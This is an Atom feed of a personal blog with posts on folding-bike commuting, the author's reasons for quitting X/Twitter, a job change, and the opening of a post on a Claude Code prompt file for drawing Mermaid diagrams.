<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://blog.korny.info/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.korny.info/" rel="alternate" type="text/html" /><updated>2026-04-19T19:06:56+01:00</updated><id>https://blog.korny.info/feed.xml</id><title type="html">Korny’s Blog</title><subtitle>The personal blog of Korny Sietsma</subtitle><author><name>Korny Sietsma</name></author><entry><title type="html">The Joy of Folding Bikes</title><link href="https://blog.korny.info/2026/04/19/the-joy-of-folding-bikes" rel="alternate" type="text/html" title="The Joy of Folding Bikes" /><published>2026-04-19T00:00:00+01:00</published><updated>2026-04-19T00:00:00+01:00</updated><id>https://blog.korny.info/2026/04/19/the-joy-of-folding-bikes</id><content type="html" xml:base="https://blog.korny.info/2026/04/19/the-joy-of-folding-bikes"><![CDATA[<p>I was chatting to a friend about my folding bike and I had the urge to write about it - because this falls in the category of “Things I wish I’d had decades ago”. And maybe I can encourage some others to try these wonderful devices.</p>

<p class="notice--info">Note: I’m 3 months into a new job so blogging has taken a back seat to drinking from a firehose of new domain knowledge, new people, new tech. I’m still playing with AI-assisted coding, but at a slower pace - I do hope to blog more about this when things calm down.</p>

<p>12 years ago I started cycling in London, commuting by train, and I used the bicycle hire scheme mis-named at the time “Boris Bikes”.  It was <em>OK</em> but a bit of a hassle - bikes were heavy, payment was fiddly, and often the hire racks would be empty in the morning and full in the evening.</p>

<p>So I followed the advice of other commuters and got this beautiful device - it cost £1000 at the time, a fair bit of money, but on a Ride to Work scheme I could pay this weekly over a year, so it was £4 a week, pre-tax, which made it quite affordable.</p>

<p><img src="/assets/images/2026-04-19-the-joy-of-folding-bikes/brompton_feb_2015.png" alt="Red Brompton folding bike" /></p>

<p>It’s a Brompton - and they are a marvellous brand, but I don’t want to just say “Get a Brompton” as I’m sure other brands must be competing in this space - and Bromptons are pricey. So do your own research.</p>

<p>I also (after a couple of annoying flats) got puncture-proof Schwalbe Marathon Plus tyres - and I haven’t had a single puncture since.</p>

<p>And like I said at the start - I <em>so</em> wish I’d had something like this years and years ago. So many years of commuting in Melbourne where I’d walk slowly to a station, or drive to a station and have to cram into busy parking.  So many years where my bike would languish in a shed, probably with flat tyres because I only got it out on specific “exercise” attempts.</p>

<p>The folding bike:</p>
<ul>
  <li>Lives in my study.  I have a nicer bike in the shed but almost never get it out because the bike in my study is so convenient.</li>
  <li>Can be carried in one hand - it’s heavy, about 12kg plus bags, but that’s ok for short distances.</li>
  <li>Can go on the train - this is the biggest benefit, commuting is <em>so</em> much easier when you can go cycle -&gt; train -&gt; cycle.  Most trains, even ones with “no bikes” rules, allow them - they aren’t any bigger than a large suitcase.</li>
  <li>Never gets punctures</li>
  <li>Can go in the boot of the car easily - when I get the car serviced, I drive to the garage, then cycle home, and cycle back to the garage at the end of the day.</li>
  <li>Can be carried in to the office or cafes or shops - no locking it on the street; a big benefit in London where bike thieves are everywhere and tend to carry bolt cutters or angle grinders!</li>
</ul>

<p>I do have a lock - a folding ‘silver’ grade Abus Bordo lock that mounts on the bike. But I only really use it in my home town where thieves are much rarer, or on the very rare case where I want to go in a cafe and there isn’t room for the bike - but only if I can sit with the bike in eyeshot!</p>

<p>I get it serviced every year or two. And after 11 years, it’s had nothing major go wrong - a few cable replacements and the like, but it still has the original frame, wheels, and  gears.  That’s pretty impressive for 11 years of commuting, though post-Covid I only tend to commute one day a week.</p>

<p>For a lot of people this should be fairly should be simple economics. Our station parking is £10 a day - current Brompton prices start at £1400 - so even ignoring pre-tax schemes and savings in other transport like the underground, a Brompton would pay for itself in 140 working days, or 28 weeks for the poor folks still commuting every day.</p>

<p>Plus I just love the freedom of cycling, and the exercise!</p>

<p class="notice--info">#protip If cycling in one of <a href="https://www.cyclestreets.net/area/">the supported areas</a> the free <a href="https://www.cyclestreets.net/">Cycle Streets app</a> is marvellous. It uses Open StreetMap data so users can update it when roads change, and lets you choose quiet vs fast routes. People ask me if cycling in London is safe - it’s fine if you use an app like this to avoid the worst roads, and ride sensibly with a bit of care about passing trucks or busses, and (gasp) actually obey traffic signals.</p>]]></content><author><name>Korny Sietsma</name></author><category term="Personal" /><category term="exercise" /><category term="cycling" /><category term="climate" /><summary type="html"><![CDATA[I was chatting to a friend about my folding bike and I had the urge to write about it - because this falls in the category of “Things I wish I’d had decades ago”. And maybe I can encourage some others to try these wonderful devices. Note: I’m 3 months into a new job so blogging has taken a back seat to drinking from a firehose of new domain knowledge, new people, new tech. I’m still playing with AI-assisted coding, but at a slower pace - I do hope to blog more about this when things calm down. 12 years ago I started cycling in London, commuting by train, and I used the bicycle hire scheme mis-named at the time “Boris Bikes”. It was OK but a bit of a hassle - bikes were heavy, payment was fiddly, and often the hire racks would be empty in the morning and full in the evening. So I followed the advice of other commuters and got this beautiful device - it cost £1000 at the time, a fair bit of money, but on a Ride to Work scheme I could pay this weekly over a year, so it was £4 a week, pre-tax, which made it quite affordable. It’s a Brompton - and they are a marvellous brand, but I don’t want to just say “Get a Brompton” as I’m sure other brands must be competing in this space - and Bromptons are pricey. So do your own research. I also (after a couple of annoying flats) got puncture-proof Schwalbe Marathon Plus tyres - and I haven’t had a single puncture since. And like I said at the start - I so wish I’d had something like this years and years ago. So many years of commuting in Melbourne where I’d walk slowly to a station, or drive to a station and have to cram into busy parking. So many years where my bike would languish in a shed, probably with flat tyres because I only got it out on specific “exercise” attempts. The folding bike: Lives in my study. I have a nicer bike in the shed but almost never get it out because the bike in my study is so convenient. Can be carried in one hand - it’s heavy, about 12kg plus bags, but that’s ok for short distances. Can go on the train - this is the biggest benefit, commuting is so much easier when you can go cycle -&gt; train -&gt; cycle. Most trains, even ones with “no bikes” rules, allow them - they aren’t any bigger than a large suitcase. Never gets punctures Can go in the boot of the car easily - when I get the car serviced, I drive to the garage, then cycle home, and cycle back to the garage at the end of the day. Can be carried in to the office or cafes or shops - no locking it on the street; a big benefit in London where bike thieves are everywhere and tend to carry bolt cutters or angle grinders! I do have a lock - a folding ‘silver’ grade Abus Bordo lock that mounts on the bike. But I only really use it in my home town where thieves are much rarer, or on the very rare case where I want to go in a cafe and there isn’t room for the bike - but only if I can sit with the bike in eyeshot! I get it serviced every year or two. And after 11 years, it’s had nothing major go wrong - a few cable replacements and the like, but it still has the original frame, wheels, and gears. That’s pretty impressive for 11 years of commuting, though post-Covid I only tend to commute one day a week. For a lot of people this should be fairly should be simple economics. Our station parking is £10 a day - current Brompton prices start at £1400 - so even ignoring pre-tax schemes and savings in other transport like the underground, a Brompton would pay for itself in 140 working days, or 28 weeks for the poor folks still commuting every day. Plus I just love the freedom of cycling, and the exercise! #protip If cycling in one of the supported areas the free Cycle Streets app is marvellous. It uses Open StreetMap data so users can update it when roads change, and lets you choose quiet vs fast routes. People ask me if cycling in London is safe - it’s fine if you use an app like this to avoid the worst roads, and ride sensibly with a bit of care about passing trucks or busses, and (gasp) actually obey traffic signals.]]></summary></entry><entry><title type="html">Refusing to use Twitter</title><link href="https://blog.korny.info/2026/01/25/refusing-to-use-twitter" rel="alternate" type="text/html" title="Refusing to use Twitter" /><published>2026-01-25T00:00:00+00:00</published><updated>2026-01-25T00:00:00+00:00</updated><id>https://blog.korny.info/2026/01/25/refusing-to-use-twitter</id><content type="html" xml:base="https://blog.korny.info/2026/01/25/refusing-to-use-twitter"><![CDATA[<p><img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-twitter.png" alt="No Twitter" class="align-left" style="display: inline; height: 2.0em; vertical-align: middle;" /> <img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-x.png" alt="No X" class="align-left" style="display: inline; height: 2.0em; vertical-align: middle;" /></p>

<p>I’ve completely stopped using Twitter (now called X) and I wanted to post something explaining why.</p>

<p>I stopped posting or reading the feeds quite a while ago, but despite most people I know agreeing it’s a terrible place, friends persist in sharing X posts and I get lured in to reading them. But no more. If you send me a Twitter/X link, I’ll either ignore it or politely ask you to share the content another way; or flag my unhappiness by using an emoji like <img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-x.png" alt="No X" style="display: inline; height: 1.2em; vertical-align: middle;" />.</p>

<h2 id="this-isnt-really-a-boycott">This isn’t really a boycott</h2>

<p>I should be clear about what I’m doing here. This isn’t a traditional boycott where I hope that removing my business will cost them money. X has vast resources behind it - Musk’s wealth, the backing of the Trump administration - and I don’t expect it to go away. I don’t expect meaningful economic damage from people like me leaving, except perhaps in the very long term.</p>

<p>What I do expect is that reasonable, rational, human-oriented people will increasingly not want to have meaningful conversations there. The platform has become hostile to genuine conversation - with algorithms optimised for outrage, polluted with lying bots and engagement-bait, owned by someone who uses it as a weapon.</p>

<p>So yes, I hope my friends and the communities I participate in will move elsewhere too. Not because we’ll bankrupt Musk, but because I’d rather have real conversations somewhere that isn’t… this.  And as long as you talk there, it’s perpetuating that somehow this is a valid place for conversation.</p>

<h2 id="the-problem-with-just-browsing">The problem with “just browsing”</h2>

<p>People have used tracking blockers and screenshots of posts to avoid promoting the site - but the problem is not about boosting their metrics or making them money, it’s the fact that viewing keeps legitimising the place. Every view makes the platform seem more legitimate, more relevant, more “the place where we discuss things”. It’s similar to why I won’t read the Daily Mail - even sharing something genuinely good from there helps legitimise a platform that does tremendous harm, and it’s hard to distinguish the truth from the half-truth from the utter lies.</p>

<p>There’s a story that’s been circulating for years about a bartender who kicks out a polite, well-dressed Nazi before he’s done anything wrong. When asked why, the bartender explains: you serve one, they become a regular, they bring friends, the friends bring friends, and before you know it you’re running a <a href="https://en.wiktionary.org/wiki/Nazi_bar">Nazi bar</a>. By then it’s too late - they’re entrenched and everyone else has left.</p>

<p>X has become the Nazi bar. The owner himself is boosting far-right content, doing salutes at rallies, and platforming fascists across the globe. Having a reasonable conversation there is like trying to have a quiet drink in a bar where the landlord is doing Nazi salutes behind the counter. Even if your particular corner seems fine, you’re still in the Nazi bar.</p>

<h2 id="what-x-has-become">What X has become</h2>

<p>I thought it was worth cataloguing a few of the worst examples of where things have gone</p>

<h3 id="destabilising-democracies">Destabilising democracies</h3>

<p>In January 2025, Elon Musk launched an <a href="https://www.npr.org/2025/01/07/g-s1-41296/starmer-attacks-elon-musk">unprecedented attack on the UK government</a>, posting over 100 times about UK politics with posts reaching more than 100 million views. He <a href="https://www.cnn.com/2025/01/06/uk/starmer-musk-child-sex-abuse-intl-gbr">falsely accused</a> Prime Minister Keir Starmer of being “deeply complicit in mass rapes”, called a government minister a “rape genocide apologist”, demanded Starmer’s imprisonment, and ran a poll asking if America should “liberate the people of Britain from their tyrannical government.”</p>

<p>He has <a href="https://fortune.com/europe/2025/01/09/elon-musk-reportedly-discussed-strategies-oust-keir-starmer-uk-pm-before-next-election/">discussed strategies to oust Starmer</a> before the next election and <a href="https://www.aljazeera.com/news/2025/1/3/who-is-tommy-robinson-and-why-is-elon-musk-throwing-his-weight-behind-him">called for the release of Tommy Robinson</a>, a far-right activist serving an 18-month prison sentence.</p>

<p>This isn’t just about the UK. Musk has <a href="https://www.npr.org/2025/01/27/nx-s1-5276084/elon-musk-german-far-right-afd-holocaust">endorsed Germany’s far-right AfD party</a>, telling Germans to move beyond “past guilt” over the Nazi era - a comment that <a href="https://www.nbcnews.com/news/world/elon-musks-call-germany-move-nazi-guilt-dangerous-holocaust-memorial-c-rcna189316">drew condemnation from the chairman of Israel’s Holocaust memorial</a>. He has <a href="https://www.nbcnews.com/news/world/elon-musk-europe-surging-far-right-rcna185145">boosted far-right movements in at least 18 countries</a>.</p>

<h3 id="a-firehose-of-lies">A firehose of lies</h3>

<p>Musk’s <a href="https://www.cnn.com/2024/11/04/media/elon-musk-election-x-misinformation-trump-harris/index.html">misleading election claims</a> during the 2024 US election generated over 2 billion views. PolitiFact <a href="https://www.politifact.com/article/2024/oct/23/2-weeks-450-posts-how-elon-musk-uses-his-x-profile/">analysed 450+ of his posts</a> over two weeks and found he promoted misleading or inaccurate content on most days. His misinformation <a href="https://www.nbcnews.com/tech/misinformation/musk-election-misinformation-x-officials-twitter-voting-rcna176938">travels hundreds of times further</a> than fact-checks from officials, and Community Notes failed to display corrections on 74% of his misleading election posts.</p>

<h3 id="enabling-fascism">Enabling fascism</h3>

<p>At Trump’s inauguration in January 2025, Musk made a <a href="https://www.washingtonpost.com/technology/2025/01/21/elon-musk-salute-trump-inauguration/">straight-arm gesture</a> that was widely interpreted as a Nazi salute. While some defended it as awkward enthusiasm, historian Ruth Ben-Ghiat called it “a Nazi salute - and a very belligerent one too.” Neo-Nazi groups celebrated it as such. The gesture is illegal in Germany.</p>

<p>Beyond the gestures, X itself has become a propaganda machine. Multiple studies show the algorithm <a href="https://www.avclub.com/twitter-x-amplifying-right-wing-accounts">systematically amplifies right-wing content</a> - even politically neutral new accounts get <a href="https://sciencemediacentre.es/en/independent-research-shows-xs-twitters-algorithm-can-influence-political-polarisation">twice as much right-wing content as left-wing</a>. Research during the 2024 election found the algorithm <a href="https://link.springer.com/article/10.1140/epjds/s13688-024-00456-3">amplifies hostile, emotionally aggressive political content</a> - and when that content is pushed down, people actually warm up to the opposing side.</p>

<p>X has become the platform of choice for government propaganda. Internal ICE communications <a href="https://www.washingtonpost.com/technology/interactive/2025/ice-social-media-blitz/">obtained by the Washington Post</a> show officials coordinating with the White House to create viral arrest videos, debating which “hardcore” music to use as soundtracks, and asking “should we feed info to an influencer?” A former DHS press secretary called it “propaganda, creating fear” and “meme-ification of things that are life or death.”</p>

<h3 id="enabling-sexual-abuse-through-ai">Enabling sexual abuse through AI</h3>

<p>Perhaps most disturbing is what happened with Grok, X’s AI chatbot. In late December 2025, users discovered that Grok could be prompted to <a href="https://www.washingtonpost.com/technology/2026/01/06/x-grok-deepfake-sexual-abuse/">“digitally undress” women in photos</a>, creating non-consensual sexual deepfakes. This became what Reuters described as a “mass digital undressing spree” - at its peak, <a href="https://www.cnn.com/2026/01/08/tech/elon-musk-xai-digital-undressing">Grok was producing sexualized images at a rate of roughly one per minute</a>.</p>

<p>Even worse, there were <a href="https://www.cbsnews.com/news/grok-safeguard-lapses-minors-minimal-clothing-ai/">cases where Grok generated sexualized images of minors</a>. Grok itself had to post an apology stating it had created “an AI image of two young girls (estimated ages 12-16) in sexualized attire.”</p>

<p>X’s response? <a href="https://www.nbcnews.com/tech/internet/x-paywall-ai-image-grok-app-bikini-allows-sexual-deepfakes-rcna252647">Restrict the feature to paying users</a> - meaning people could still create non-consensual imagery if they paid for the privilege. Indonesia and Malaysia have banned the chatbot entirely, and the <a href="https://www.pbs.org/newshour/show/musks-grok-ai-faces-more-scrutiny-after-generating-sexual-deepfake-images">UK’s Ofcom has launched a formal investigation</a>. X have since apparently backed down … after much pressure, and only in this one area.</p>

<h2 id="why-dont-i-just-ignore-it">Why don’t I just ignore it?</h2>

<p>Why post this at all? Why use <img src="/assets/images/2026-01-25-refusing-to-use-twitter/no-x.png" alt="No X" style="display: inline; height: 0.8em; vertical-align: middle;" /> emojis and other passive-agressive stuff? Aren’t I being rude and oppressing other people’s right to free speech?</p>

<p>Because this stuff is important; the world is in a terrible state and I think people have passively let things get worse and worse with minimal response.  I’m not stopping your free speech - just pointing out that you are posting your free speech in a Nazi pub and I’m not going to listen, in fact I’m going to remind you that you are doing so.  Feel free to ignore me - but if you value my conversation at all, consider finding another source of that information to share.</p>

<h2 id="where-ill-be-instead">Where I’ll be instead</h2>

<p>I’m still on <a href="https://hachyderm.io/@korny">Mastodon</a> and <a href="https://bsky.app/profile/korny.info">Bluesky</a>, and those are where I’d love to see more people. I’m also willing to tolerate Instagram and Threads - Facebook/Meta are certainly no paragons of virtue, but at least they aren’t as openly, gleefully horrible as what X has become. There’s a difference between “problematic tech company” and “actively working to destabilise democracies while enabling the creation of child sexual abuse material.” Or <a href="https://www.linkedin.com/in/korny/">LinkedIn</a> if you don’t mind the somewhat false corporate sheen over the whole place.</p>

<h2 id="mourning-old-twitter">Mourning old Twitter</h2>

<p>Just to be clear: I’m sad about this. Twitter was amazing when it was new - so much open debate and discussion and information. I read and posted huge amounts there in the 2010s and early 2020s and while I haven’t participated for a while, I still miss it.</p>

<p>But that Twitter is gone. What wears its skin is something else entirely - a platform optimised for engagement-bait, algorithmic amplification of outrage, and the political projects of its <a href="https://en.wikipedia.org/wiki/Broligarchy">broligarch</a> owner.</p>

<p>I can’t pretend otherwise anymore, and I can’t keep feeding it with my attention.</p>

<hr />

<p>If you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115957135117935614">my post on Mastodon</a> or <a href="https://bsky.app/profile/korny.sietsma.com/post/3mdbe3j76mk2q">my post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>]]></content><author><name>Korny Sietsma</name></author><category term="World" /><category term="Personal" /><category term="politics" /><category term="social-media" /><category term="twitter" /><category term="x" /><summary type="html"><![CDATA[I’ve completely stopped using Twitter (now called X) and I wanted to post something explaining why. I stopped posting or reading the feeds quite a while ago, but despite most people I know agreeing it’s a terrible place, friends persist in sharing X posts and I get lured in to reading them. But no more. If you send me a Twitter/X link, I’ll either ignore it or politely ask you to share the content another way; or flag my unhappiness by using an emoji like . This isn’t really a boycott I should be clear about what I’m doing here. This isn’t a traditional boycott where I hope that removing my business will cost them money. X has vast resources behind it - Musk’s wealth, the backing of the Trump administration - and I don’t expect it to go away. I don’t expect meaningful economic damage from people like me leaving, except perhaps in the very long term. What I do expect is that reasonable, rational, human-oriented people will increasingly not want to have meaningful conversations there. The platform has become hostile to genuine conversation - with algorithms optimised for outrage, polluted with lying bots and engagement-bait, owned by someone who uses it as a weapon. So yes, I hope my friends and the communities I participate in will move elsewhere too. Not because we’ll bankrupt Musk, but because I’d rather have real conversations somewhere that isn’t… this. And as long as you talk there, it’s perpetuating that somehow this is a valid place for conversation. The problem with “just browsing” People have used tracking blockers and screenshots of posts to avoid promoting the site - but the problem is not about boosting their metrics or making them money, it’s the fact that viewing keeps legitimising the place. Every view makes the platform seem more legitimate, more relevant, more “the place where we discuss things”. It’s similar to why I won’t read the Daily Mail - even sharing something genuinely good from there helps legitimise a platform that does tremendous harm, and it’s hard to distinguish the truth from the half-truth from the utter lies. There’s a story that’s been circulating for years about a bartender who kicks out a polite, well-dressed Nazi before he’s done anything wrong. When asked why, the bartender explains: you serve one, they become a regular, they bring friends, the friends bring friends, and before you know it you’re running a Nazi bar. By then it’s too late - they’re entrenched and everyone else has left. X has become the Nazi bar. The owner himself is boosting far-right content, doing salutes at rallies, and platforming fascists across the globe. Having a reasonable conversation there is like trying to have a quiet drink in a bar where the landlord is doing Nazi salutes behind the counter. Even if your particular corner seems fine, you’re still in the Nazi bar. What X has become I thought it was worth cataloguing a few of the worst examples of where things have gone Destabilising democracies In January 2025, Elon Musk launched an unprecedented attack on the UK government, posting over 100 times about UK politics with posts reaching more than 100 million views. He falsely accused Prime Minister Keir Starmer of being “deeply complicit in mass rapes”, called a government minister a “rape genocide apologist”, demanded Starmer’s imprisonment, and ran a poll asking if America should “liberate the people of Britain from their tyrannical government.” He has discussed strategies to oust Starmer before the next election and called for the release of Tommy Robinson, a far-right activist serving an 18-month prison sentence. This isn’t just about the UK. Musk has endorsed Germany’s far-right AfD party, telling Germans to move beyond “past guilt” over the Nazi era - a comment that drew condemnation from the chairman of Israel’s Holocaust memorial. He has boosted far-right movements in at least 18 countries. A firehose of lies Musk’s misleading election claims during the 2024 US election generated over 2 billion views. PolitiFact analysed 450+ of his posts over two weeks and found he promoted misleading or inaccurate content on most days. His misinformation travels hundreds of times further than fact-checks from officials, and Community Notes failed to display corrections on 74% of his misleading election posts. Enabling fascism At Trump’s inauguration in January 2025, Musk made a straight-arm gesture that was widely interpreted as a Nazi salute. While some defended it as awkward enthusiasm, historian Ruth Ben-Ghiat called it “a Nazi salute - and a very belligerent one too.” Neo-Nazi groups celebrated it as such. The gesture is illegal in Germany. Beyond the gestures, X itself has become a propaganda machine. Multiple studies show the algorithm systematically amplifies right-wing content - even politically neutral new accounts get twice as much right-wing content as left-wing. Research during the 2024 election found the algorithm amplifies hostile, emotionally aggressive political content - and when that content is pushed down, people actually warm up to the opposing side. X has become the platform of choice for government propaganda. Internal ICE communications obtained by the Washington Post show officials coordinating with the White House to create viral arrest videos, debating which “hardcore” music to use as soundtracks, and asking “should we feed info to an influencer?” A former DHS press secretary called it “propaganda, creating fear” and “meme-ification of things that are life or death.” Enabling sexual abuse through AI Perhaps most disturbing is what happened with Grok, X’s AI chatbot. In late December 2025, users discovered that Grok could be prompted to “digitally undress” women in photos, creating non-consensual sexual deepfakes. This became what Reuters described as a “mass digital undressing spree” - at its peak, Grok was producing sexualized images at a rate of roughly one per minute. Even worse, there were cases where Grok generated sexualized images of minors. Grok itself had to post an apology stating it had created “an AI image of two young girls (estimated ages 12-16) in sexualized attire.” X’s response? Restrict the feature to paying users - meaning people could still create non-consensual imagery if they paid for the privilege. Indonesia and Malaysia have banned the chatbot entirely, and the UK’s Ofcom has launched a formal investigation. X have since apparently backed down … after much pressure, and only in this one area. Why don’t I just ignore it? Why post this at all? Why use emojis and other passive-agressive stuff? Aren’t I being rude and oppressing other people’s right to free speech? Because this stuff is important; the world is in a terrible state and I think people have passively let things get worse and worse with minimal response. I’m not stopping your free speech - just pointing out that you are posting your free speech in a Nazi pub and I’m not going to listen, in fact I’m going to remind you that you are doing so. Feel free to ignore me - but if you value my conversation at all, consider finding another source of that information to share. Where I’ll be instead I’m still on Mastodon and Bluesky, and those are where I’d love to see more people. I’m also willing to tolerate Instagram and Threads - Facebook/Meta are certainly no paragons of virtue, but at least they aren’t as openly, gleefully horrible as what X has become. There’s a difference between “problematic tech company” and “actively working to destabilise democracies while enabling the creation of child sexual abuse material.” Or LinkedIn if you don’t mind the somewhat false corporate sheen over the whole place. Mourning old Twitter Just to be clear: I’m sad about this. Twitter was amazing when it was new - so much open debate and discussion and information. I read and posted huge amounts there in the 2010s and early 2020s and while I haven’t participated for a while, I still miss it. But that Twitter is gone. What wears its skin is something else entirely - a platform optimised for engagement-bait, algorithmic amplification of outrage, and the political projects of its broligarch owner. I can’t pretend otherwise anymore, and I can’t keep feeding it with my attention. If you want to discuss this post, please reply to my post on Mastodon or my post on Bluesky (I’m doing both as one is more free, one is more convenient for many people)]]></summary></entry><entry><title type="html">New year, new everything</title><link href="https://blog.korny.info/2026/01/17/new-year-new-everything" rel="alternate" type="text/html" title="New year, new everything" /><published>2026-01-17T00:00:00+00:00</published><updated>2026-01-17T00:00:00+00:00</updated><id>https://blog.korny.info/2026/01/17/new-year-new-everything</id><content type="html" xml:base="https://blog.korny.info/2026/01/17/new-year-new-everything"><![CDATA[<p>I haven’t posted in 3 months! That’s partly because I put a lot of work into the <a href="https://martinfowler.com/articles/agentic-ai-security.html">extended version of my Agentic AI security post on martinfowler.com</a> - and partly as since posting that I have changed jobs. After 2 years at Liberis I’ve decided to move on - on Monday I start a new position as a Principal Engineer at <a href="https://en.wikipedia.org/wiki/John_Lewis_Partnership">John Lewis Partnership</a>!</p>

<p>I’m quite excited about the new position - John Lewis Partnership are a fascinating organisation - employee owned and with quite a strong set of <a href="https://www.jlpjobs.com/about-the-partnership/">values and ethics</a>, and their software engineering group sounds like they have a good culture - I especially like their <a href="https://engineering-principles.jlp.engineering/">published engineering principles</a>.</p>

<p>But as a result of this, most of my spare time in the last 3 months was taken up with the job process, and then winding up and handing over work at Liberis has kept me busy - as well as all the usual chaos of Christmas. I’ve still been having lots of fun playing with Agentic AI tools, keeping up with the changes, rolling my eyes at the hype.</p>

<p>It is traditional in a new year to ruminate on the state of things - and there’s a lot to ruminate on.  We seem to be in a time of huge change.</p>

<p>AI is both a blessing and a curse. The AI hype continues - I have a whole draft blog post about “AI Hype 2.0” which I hope to write some day - but despite being annoyed at the hype, I have to admit AI tools have changed my work drastically. In October 2023 I was <a href="/2023/10/31/playing-with-rust-and-copilot">posting here</a> about how Cursor was handy but couldn’t really tackle complex rust code - I don’t think I would have believed you if you’d told me that in 2 years I’d be using AI assistance for pretty well all my software development - and most of my non-development work as well.</p>

<p>But - AI slop and misuse is a huge risk, as is the IP theft in so much creative AI use, as is the high risk of the AI bubble bursting, and the fact that horrible tech-bro fascist-leaning maniacs are profiting from all this.  And they are burning fossil fuels to power the engines behind this. (see also my standard <a href="/ai-disclaimer/">AI Disclaimer</a>)</p>

<p>Meanwhile governments are sliding towards fascism and imperialism, while funding the horrible tech oligarchs … it’s all a mess. While the planet burns. There are glimmers of hope, but it’s tough times and going to be horrible times for many people.</p>

<p>I don’t really have time or space to talk a lot about this right now, but I don’t want to ignore it and just post blithely about neat stuff I’ve done with rust scripts. The world is a mess and we all need to think about and talk about and work towards trying to fix it.</p>

<p>Happy 2026 and I hope it’s a good one for y’all out there!</p>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="World" /><category term="Personal" /><category term="ai" /><category term="tech" /><category term="work" /><category term="politics" /><summary type="html"><![CDATA[I haven’t posted in 3 months! That’s partly because I put a lot of work into the extended version of my Agentic AI security post on martinfowler.com - and partly as since posting that I have changed jobs. After 2 years at Liberis I’ve decided to move on - on Monday I start a new position as a Principal Engineer at John Lewis Partnership! I’m quite excited about the new position - John Lewis Partnership are a fascinating organisation - employee owned and with quite a strong set of values and ethics, and their software engineering group sounds like they have a good culture - I especially like their published engineering principles. But as a result of this, most of my spare time in the last 3 months was taken up with the job process, and then winding up and handing over work at Liberis has kept me busy - as well as all the usual chaos of Christmas. I’ve still been having lots of fun playing with Agentic AI tools, keeping up with the changes, rolling my eyes at the hype. It is traditional in a new year to ruminate on the state of things - and there’s a lot to ruminate on. We seem to be in a time of huge change. AI is both a blessing and a curse. The AI hype continues - I have a whole draft blog post about “AI Hype 2.0” which I hope to write some day - but despite being annoyed at the hype, I have to admit AI tools have changed my work drastically. In October 2023 I was posting here about how Cursor was handy but couldn’t really tackle complex rust code - I don’t think I would have believed you if you’d told me that in 2 years I’d be using AI assistance for pretty well all my software development - and most of my non-development work as well. But - AI slop and misuse is a huge risk, as is the IP theft in so much creative AI use, as is the high risk of the AI bubble bursting, and the fact that horrible tech-bro fascist-leaning maniacs are profiting from all this. And they are burning fossil fuels to power the engines behind this. (see also my standard AI Disclaimer) Meanwhile governments are sliding towards fascism and imperialism, while funding the horrible tech oligarchs … it’s all a mess. While the planet burns. There are glimmers of hope, but it’s tough times and going to be horrible times for many people. I don’t really have time or space to talk a lot about this right now, but I don’t want to ignore it and just post blithely about neat stuff I’ve done with rust scripts. The world is a mess and we all need to think about and talk about and work towards trying to fix it. Happy 2026 and I hope it’s a good one for y’all out there!]]></summary></entry><entry><title type="html">Agent Mermaid reporting for duty</title><link href="https://blog.korny.info/2025/10/10/agent-mermaid-reporting-for-duty" rel="alternate" type="text/html" title="Agent Mermaid reporting for duty" /><published>2025-10-10T00:00:00+01:00</published><updated>2025-10-10T00:00:00+01:00</updated><id>https://blog.korny.info/2025/10/10/agent-mermaid-reporting-for-duty</id><content type="html" xml:base="https://blog.korny.info/2025/10/10/agent-mermaid-reporting-for-duty"><![CDATA[<p><em>Note</em> see also my standard <a href="/ai-disclaimer/">AI Disclaimer</a></p>

<p class="notice--info"><strong>Update:</strong> This post was updated to use the latest Mermaid version, and a few other tweaks.</p>

<p><img src="/assets/images/2025-10-10-agent-mermaid-reporting-for-duty/mermaid_logo.svg" alt="svg picture of a mermaid with sunglasses on" /><sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>

<h2 id="introduction">Introduction</h2>

<p>My last few posts have been rather theoretical, this is back to a “here is how I solved a problem” post.</p>

<p>A while ago I <a href="/2025/03/14/mermaid-js-revisited">blogged about better ways to make Mermaid diagrams</a> but that was in the “before times” when I would do these things by hand, like a savage. OK I still edit them by hand - but LLMs like Claude Code are pretty good at drawing Mermaid - it’s just text, after all.</p>

<p>However, out of the box, Claude is trained on sample mermaid code in the wild - so it doesn’t always know the latest syntax, recent additions, or my own preferences. So this is a classic scenario where prompting can help.</p>

<h2 id="the-basic-prompt">The basic prompt</h2>

<p>My first attempt at this just embedded all my Mermaid preferences in a markdown file I could load. Note I load this <em>as needed</em> - I don’t always want to draw Mermaid diagrams, and a key thing we are all discovering about agentic LLM tools is <em>don’t pollute the context</em> - the more things you tell Claude about, the worse it performs. So for Mermaid I have a prompt command <code class="language-plaintext highlighter-rouge">/better-mermaid</code> that loads all my settings into the current session. If I start a new session, or run <code class="language-plaintext highlighter-rouge">/clear</code>, all that noise is gone.</p>

<p>My prompt starts:</p>

<div class="language-markdown highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gh"># Mermaid.js Guide for Claude Code</span>

This is an advanced guide to building mermaid diagrams

<span class="gu">## My preferences</span>
<span class="p">
-</span> I like light backgrounds, so any text displayed on the background should be black or dark
<span class="p">-</span> For text on shapes, you should make sure that either you use light text on a dark shape, or dark text on a light shape.

<span class="gu">## Quick Reference</span>
<span class="p">
-</span> <span class="gs">**Hand-drawn look**</span>: Add <span class="sb">`config: look: handDrawn`</span> in frontmatter
<span class="p">-</span> <span class="gs">**Invisible subgraphs**</span>: Use <span class="sb">`classDef invisible fill:#0000,stroke:#0000;`</span>
<span class="p">-</span> <span class="gs">**New shape syntax**</span>: <span class="sb">`NodeName@{shape: diamond, label: "Decision"}`</span>
<span class="p">-</span> <span class="gs">**Common shapes**</span>: rect, rounded, diamond (decisions), cyl (database), doc (document), hex (process), trap-b (trapezoid), lean-r (I/O)
</code></pre></div></div>

<p><a href="/assets/files/2025-10-10-agent-mermaid-reporting-for-duty/mermaid-basic.md">Here is the full file</a>.</p>

<p>Note this was largely generated by Claude, partly based on my previous blog post! I’ve tweaked it a few times but it’s very hard to predict what will and won’t make good diagrams; this definitely needs more tweaking over time, and to suit individual preferences.</p>

